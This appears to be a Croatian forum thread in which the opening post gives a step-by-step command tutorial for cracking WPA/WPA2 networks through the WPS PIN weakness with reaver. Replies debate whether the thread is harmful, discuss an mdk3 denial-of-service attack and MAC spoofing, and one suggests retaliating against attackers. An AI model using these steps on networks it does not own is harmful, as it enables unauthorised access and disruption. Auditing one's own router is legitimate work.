Testiranje wps sigurnosti na wpa/wpa2 zaštitama

poruka: 30
|
čitano: 15.454
|
moderatori: Lazarus Long, pirat, XXX-Man, DrNasty, vincimus
1
+/- sve poruke
ravni prikaz
starije poruke gore
15 godina
neaktivan
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

Tutorial je napravljen samo kako bi testirali SVOJU mrežu, ja nisam odgovoran ni za kakve vaše postupke.

 

-Objašnjenje pojmova:

 -wpa/wpa2:  (Wi-Fi protected acess) zaštita koja se trenutno smatra sigurnom

 -wps: (Wi-Fi Protected Set-up) omogučava jednostavno postavljanje sigurnosti mreže za svakodnevne korisnike

 

-Provjera:

 

1. Trebat ćemo neki linux operacijski sistem (npr. Backtrack, Ubuntu, ...)
 [Backtrack možete skinuti sa službene stranice: http://www.backtrack-linux.org/downloads/ ]

2. Nakon skidanja snimite sliku (iso) koju ste skinuli na dvd i botajte sistem s njega
 ako automatski ne uđe u  vizualni način rada napišite komandu "startx"

3. Spojite wifi karticu u računalo i pokrenite naredbeni redak (slika1)
upišite:
airmon-ng
airmon-ng stop wlan0 (moguče je da će vam biti neki drugi broj)
airmon-ng start wlan0 (sada smo karticu u tzv. monitor mode)

4. Upišite:
wash -i mon0
(ako se tu ne pojavi vaša mreža 99% je da ju ne možete probiti ovim načinom)

5.Upišite:(slika2)
airodump-ng mon0
(kopirajte BSSID kraj imena vaše mreže)

6. Upišite:(slika3)
reaver -i mon0 -b (BSSID vaše mreže) -vv
(ako ga nemate instaliranog napišite sljedeće:
wget http://reaver-wps.googlecode.com/file...
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
make install
reaver -i mon0 -b (BSSID vaše mreže) -vv)
sačekajte dok ne dobijete rezultat kao na slici 4

 

-Zaštita:

Ako ste uspjeli probiti WPS i WPA pin otvorite browser i upišite 192.168.0.1 ili 192.168.1.1 i pristupite svom ruteru. Podatci za pristup su najčešće: User: Admin, Password: admin ; User: User, Password: user ; User: User, Password: (piše na donjoj strani rutera).

 

Kada uđete u ruter nađite WPS ili Wi-Fi protected setup i isključite ga, promijenite WPA/WPA2 key i spremite postavke.

 

 

 

-Za ostala pitanja možete mi se obratiti i u privatne poruke

5 Probio sam WPS pin
0 Nisam probio WPS pin
slika broj 1 slika broj 1
slika broj 2 slika broj 2
slika broj 3 slika broj 3
slika broj 4 slika broj 4
Poruka je uređivana zadnji put sub 1.6.2013 14:04 (rockman).
Moj PC  
6 1 hvala 3
16 godina
neaktivan
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

Funny Games   {#}

I know that probably somebody will think this is stupid but i have nothing better to do
 
2 0 hvala 0
12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

...

Poruka je uređivana zadnji put sub 1.6.2013 3:54 (Cryogenic).
Moj PC  
0 0 hvala 0
15 godina
neaktivan
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam

koja?

 

12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

lako tu mrezu probit kad su prve znamenke pina 0147 (probijao si je niti pola sata). probaj probit mrezu ako su prve znamenke 8xxx ili 9xxx (nacekat ces se sate i sate). btw mogao si objasnit zasto to ide relativno brzo (pin je od 2 dijela + checksum). mogao si rec da to ne pali na thompson routerima jer ces se nacekat najmanje  mjesec dana. ovo ne radi na starijim roterima kao npr siemens se555 ili zyxel itd.  cini mi se da postoje 2 alata za bruteforce wps keya pa objasni kako se drugi koristi

edit: evo i drugi alat http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/

Poruka je uređivana zadnji put sub 1.6.2013 12:42 (peace_of_cake).
 
0 0 hvala 0
15 godina
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam
peace_of_cake kaže...

lako tu mrezu probit kad su prve znamenke pina 0147 (probijao si je niti pola sata). probaj probit mrezu ako su prve znamenke 8xxx ili 9xxx (nacekat ces se sate i sate). btw mogao si objasnit zasto to ide relativno brzo (pin je od 2 dijela + checksum). mogao si rec da to ne pali na thompson routerima jer ces se nacekat najmanje  mjesec dana. ovo ne radi na starijim roterima kao npr siemens se555 ili zyxel itd.  cini mi se da postoje 2 alata za bruteforce wps keya pa objasni kako se drugi koristi

-probijao je 48minuta... dovoljno je prvu znamenku promijeniti s 0-na- ... i odu sati.

rockman kaže...

Tutorial je napravljen samo kako bi testirali SVOJU mrežu, ja nisam odgovoran ni za kakve vaše postupke.

..

-zašto nebi bio odgovoran? Čemu tema? C/P nečeg s neta?

-ok, može poslužiti kao prikaz slabosti, ali nisi npr početnicima preporučio kako se zaštititi, koji standardi su kod izbora šifre (kombinacija znakova, izbjagavati popularne fraze i sl). Nema ni jedne pozitivne stvari u temi koja bi bila u cilju zaštite, isključivo negativne, tj probijanje koje je već u definiciji negativna stvar.

Početnici nisu crno-kapić/bijelo-kapić juzeri.

 

-tema je smeće, kojem disclaimer ne pomaže, jer svejdno wanabehackere navlači na probijanje wifija. Svoju mrežu korisnik ne mora probijati, nema tu nikave edukacije, oni koji se time bave već znaju i imaju google.. dakle ipak je za početnike koji nakon pokušaja možda završe u novinama kao ZD klinci.

 

-preporuka modovima brisati, jer koristi nema, osim filozofiranja koliko vremena je potrebno i ima li smisla. Isto pravilo vrijedi za crack-soft-TPB, ovo je opasnije-kažnjivo automatizmom po KZ.

C64/TurboModul-OpenSourceProject.org.cn.部分作品为网上收集整理,供开源爱好者学习使用
Poruka je uređivana zadnji put sub 1.6.2013 13:06 (ihush).
15 godina
odjavljen
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

Slažem se sa ihushom, ovo je s*anje od teme. Nije objašnjeno baš ništa osim kako (pokušati) crackati mrežu.

 

Ni slova o potencijalnim problemima, odmah se skida čitav backtrack za nešto što se može sa običnim ubuntuom, nigdje sugestije kako povećati sigurnost...

 

P.S. Evo ti moj Siemens SX763, crackaj njega. Good luck. Zašto? Nemaš pojma.

http://nighthawk-software.blogspot.com/
Moj PC  
2 0 hvala 2
15 godina
neaktivan
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

ja nisam postavljao šifru nego je generirana na webu

zaštititi se moguće jedino isključivanjem WPSa

 

Moj PC  
0 0 hvala 0
12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

sum_of_all_fears, cim to pitas vjerovatno imas dd-wrt na njemu, jesam u pravu?

 
1 0 hvala 0
15 godina
odjavljen
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam
rockman kaže...

ja nisam postavljao šifru nego je generirana na webu

zaštititi se moguće jedino isključivanjem WPSa

I'll tell you a little secret - na 90% T-com routera WPS ostane upaljen, samo se disablea tipka za registraciju.

 

peace_of_cake kaže...

sum_of_all_fears, cim to pitas vjerovatno imas dd-wrt na njemu, jesam u pravu?

Smijeh

 

Go and crack that baby ;)

http://nighthawk-software.blogspot.com/
Poruka je uređivana zadnji put sub 1.6.2013 13:01 (Sum_of_all_fears).
12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

to sam skužio i potvdio vec odavno

 
0 0 hvala 0
12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

samo da znas, opet ti moze prakticki napadat router sa mdk3 pa ce ti se router zablokirat pa ni ti neces moc na net. ako netko pusta cijeli dan da mdk3 radi i attacka tvoj router to je gore nego sa reaverom pin probijat

 
0 0 hvala 0
15 godina
odjavljen
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam

Da, može spammat router ali do pina neće doć. Stvar je u tome što je dovoljno ugasit router na minutu-dvije.

http://nighthawk-software.blogspot.com/
12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

i cim upalis router ce se opet zablokirat ako mdk3 jos uvijek radi. naravno da do pina nece doci jer taj alat nije ni namijenjen za to

 
0 0 hvala 0
15 godina
neaktivan
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

planirao sam još dopunjavati temu jer mi se jućer nije dalo više

Moj PC  
0 0 hvala 0
15 godina
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam
Sum_of_all_fears kaže...

Da, može spammat router ali do pina neće doć. Stvar je u tome što je dovoljno ugasit router na minutu-dvije.

 

peace_of_cake kaže...

i cim upalis router ce se opet zablokirat ako mdk3 jos uvijek radi. naravno da do pina nece doci jer taj alat nije ni namijenjen za to

 

.. evo jingjang pravila, pa čak i ova tema ima nešto dobrog u sebi. U slučaju takvih napada, što da takav juzer napravi, tj dali je itko ikad prijavio napad ISPu, koja 'šifra' je potrebna za prolaz Reikija (papagaji na telefonu koji juzera uče disati gledajući lampice i tipkanjem 192.168..), dali uopće postoji predviđen protokol (morao bi postojati, jednako kao 112-poziv).

-drugi dio, ISP postavlja svoj firmware (drugačiji od proizvođačkog, onemogućene neke funkcije) i ima pristup modemu, povremeno resetira ili updatea soft pa ga vrati na početne postavke-šifre ili on-off neke opcije. Juzer nema potpunu kontrolu i ISP je odgovoran za sve što se desi. Pravni dio nije rješen, nema if-then protokola ili žalbe. npr netko se ovakvom metodom spoji i napravi nešto kažnjivo, vlasnik linije je kriv /odgovoran, ISP-juzer? ... mogla bi tema bit korisnija osim backtrackinga.

C64/TurboModul-OpenSourceProject.org.cn.部分作品为网上收集整理,供开源爱好者学习使用
Poruka je uređivana zadnji put sub 1.6.2013 13:19 (ihush).
12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

spamanje sa mdk3 je gore nego reaver ili aircrack jer praktički onemogućuje korištenje iptv-a, interneta i telefona (ako je preko voip-a). zaštite protiv toga skoro da i nema

 
1 0 hvala 0
15 godina
odjavljen
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam
ihush kaže...
.. evo jingjang pravila, pa čak i ova tema ima nešto dobrog u sebi. U slučaju takvih napada, što da takav juzer napravi, tj dali je itko ikad prijavio napad ISPu, koja 'šifra' je potrebna za prolaz Reikija (papagaji na telefonu koji juzera uče disati gledajući lampice i tipkanjem 192.168..), dali uopće postoji predviđen protokol (morao bi postojati, jednako kao 112-poziv).

-drugi dio, ISP postavlja svoj firmware (drugačiji od proizvođačkog, onemogućene neke funkcije) i ima pristup modemu, povremeno resetira ili updatea soft pa ga vrati na početne postavke-šifre ili on-off neke opcije. Juzer nema potpunu kontrolu i ISP je odgovoran za sve što se desi. Pravni dio nije rješen, nema if-then protokola ili žalbe. npr netko se ovakvom metodom spoji i napravi nešto kažnjivo, vlasnik linije je kriv /odgovoran, ISP-juzer? ... mogla bi tema bit korisnija osim backtrackinga.

Problem je u tome što nema nikakvih podataka o napadaču osim njegove MAC adrese koja može biti fakeana.

 

Ovaj ISPovski nadzor nad routerima je jedan od razloga zašto sam stavio dd-wrt. Jednom mi je krepao "server" - ne mogu do SQLa, IISa, FTPa, ničeg. Portovi forwardirani, t-com fw isključen, fw na serveru nitko nije dirao. 6 sati kasnije, cijeli setup magično proradi kada sam stavio staru Kasdu jer više nisam imao ideje zašto lokalno sve radi a izvana ne mogu ni do čega. Ispostavilo se da je neki tehničar ili nešto drugo prčkalo po routeru i stanje u port forwardu uopće nije odgovaralao stvarnom stanju - svi portovi su bili blokirani. I jednom su mi promijenili pass od WiFija pa sam izgubio pola sata dok sam svojima kod kuće preko telefona objašnjavao kako doznat koja je uopće prokleta šifra.

 

Tako da, ako je firmware od ISPa, mislim da su oni odgovorni za svaku štetu nastalu zbog pogrešno podešenog routera (zato na novim ne možeš napraviti baš ništa kroz web sučelje) a ako netko ima nešto "vanserijsko" (kao ja), ako mi netko onesposobi mrežu, net i nabije računa, sam sam si kriv što ga nisam zaštitio kako treba jer krivca neću ulovit. macchanger je zlo.

 

P.S. aireplay i mass deauth...

http://nighthawk-software.blogspot.com/
Poruka je uređivana zadnji put sub 1.6.2013 13:42 (Sum_of_all_fears).
12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

koliko sam skužio kod spamanja sa mdk3 on sam postavlja random mac adrese pa ces u log-u vidjet na tisuće mac adresašto ti ništa ne znači

 
2 0 hvala 0
16 godina
neaktivan
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam
peace_of_cake kaže...

koliko sam skužio kod spamanja sa mdk3 on sam postavlja random mac adrese pa ces u log-u vidjet na tisuće mac adresašto ti ništa ne znači

  točno!

I know that probably somebody will think this is stupid but i have nothing better to do
15 godina
odjavljen
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

Pa taman da je i samo jedna MAC, ionako je neupotrebljiva. Ukratko, napadača na mrežu je skoro pa nemoguće otkriti.

http://nighthawk-software.blogspot.com/
Moj PC  
0 1 hvala 0
16 godina
neaktivan
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam
Sum_of_all_fears kaže...

Pa taman da je i samo jedna MAC, ionako je neupotrebljiva. Ukratko, napadača na mrežu je skoro pa nemoguće otkriti.

  ako je ne fejka, onda je itekako korisna :/

I know that probably somebody will think this is stupid but i have nothing better to do
15 godina
odjavljen
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam

Fejkaju je skoro svi - od n00beka koji to rade jer piše u tutorialu (11:22....) pa do profesionalaca koji to znaju da moraju napraviti.

http://nighthawk-software.blogspot.com/
16 godina
neaktivan
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam
Sum_of_all_fears kaže...

Fejkaju je skoro svi - od n00beka koji to rade jer piše u tutorialu (11:22....) pa do profesionalaca koji to znaju da moraju napraviti.

hm...{#}

I know that probably somebody will think this is stupid but i have nothing better to do
15 godina
odjavljen
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam

Dobro, i da ju zaboravi fakeati. Što onda? Imam MAC napadača, koji bi bio postupak dalje, koga zvati?

http://nighthawk-software.blogspot.com/
16 godina
neaktivan
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam
Sum_of_all_fears kaže...

Dobro, i da ju zaboravi fakeati. Što onda? Imam MAC napadača, koji bi bio postupak dalje, koga zvati?

Chuck Norrisa {#}

 

Ako je netko iz neposredne blizine, vidit ćeš tu mac adresu na što se učestalo spaja...itd.

I know that probably somebody will think this is stupid but i have nothing better to do
13 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

Nek napada i probija. Lijepo ga zasnifas i uzvratis u najmanju ruku istom mjerom. Kad pogledas tko su ti hackeri vrlo lako ces ga nauciti pameti.

Stručnjak za odmaganje...
 
1 0 hvala 0
12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

a sto ako napadač koristi wifi karticu samo za  probijanje zaštite i za ništa drugo tj ne spaja se sa njom na svoju mrežu? kako će ga tada netko otkrit?

 
0 0 hvala 0
15 godina
offline
Re: Testiranje wps sigurnosti na wpa/wpa2 zaštitam

nikako, tj ne morra se ni posebno čuvati, jer MAC adresa (ako nije fejkana) ne znači ništa dok nemamo računalo koje je sumnjivo. Pošto je wifi može se predpostaviti da je u krugu 50-300m to je sve. Čak i obrnuto, pošto se može fejkati, i osoba koju se uhvati s tim MAcom mogla bi se (teoretski) braniti da nije.. tj da je netko fejkao taj broj. Obrazloženje čak može biti 'logično' tj da probijanje nitko s imalo znanja neće raditi bez osnovnih zaštita kao i macchangera... tj da je netk drugi namjerno korsitio taj mac (to ima smisla), pogotovo što je dio zaštite routera wlana mac filtritranje, pa je to i preduvijet u tom slučaju.

-naravno, jedini način je prijava nadležnima, koji bi tad po nekoj logici praćenjem došli do konkretnog dokaza (kao za torrentiranje). Problem je što nije ništa regulirano-predviđeno.. osim za policijeske potrebe kad love ciljanu skupinu ili počinitelja, na osobnu prijavu se (za sad) nitko od njih ne aktivira...

C64/TurboModul-OpenSourceProject.org.cn.部分作品为网上收集整理,供开源爱好者学习使用
Poruka je uređivana zadnji put ned 2.6.2013 18:21 (ihush).
12 godina
offline
Testiranje wps sigurnosti na wpa/wpa2 zaštitama

zanimljiva tema postala je neaktivna {#}

 
1 0 hvala 0
1
Nova poruka
E-mail:
Lozinka:
 
vrh stranice